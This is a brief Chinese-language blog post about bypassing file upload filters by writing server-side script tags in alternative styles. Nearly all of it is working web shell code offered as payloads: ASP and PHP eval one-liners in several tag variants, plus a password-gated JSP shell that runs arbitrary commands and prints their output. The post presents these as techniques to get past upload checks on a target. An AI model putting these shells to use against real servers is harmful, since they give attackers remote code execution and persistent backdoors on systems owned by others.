MENU

文件上传绕过--脚本语言标记风格的活学活用

September 3, 2020 • Read: 336 • 记录,Web阅读设置

0x00 前言

项目中遇到一个上传点,尴尬突破不了上传,想到可以用不同的脚本语言标记风格,最后突破了上传,简单记录总结下标记风格。

0x01 标记风格

1.ASP

当时用这种突破了上传限制,限制内容不能含有<%的这种。于是可以用

<script language="VBScript" runat="server">
eval request("xxx")
</script>

另外的格式。

<%eval request("xxx")%>

2.PHP

<?php @eval($_POST['xxx']); ?>
//官方风格
<? @eval($_POST['xxx']); ?>
//短标记风格,需配置文件php.ini中开启short+open_tag
<% @eval($_POST['xxx']); %>
//ASP风格,需配置文件php.ini中开启asp_tags
<script language=”php”> @eval($_POST['xxx']); </script>
//script标记的风格,这种风格在任何情况下都可以使用。

3.JSP

<%
    if("023".equals(request.getParameter("xxx"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

//官方风格

原文作者:Keefe

原文链接:文件上传绕过--脚本语言标记风格的活学活用

版权声明:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可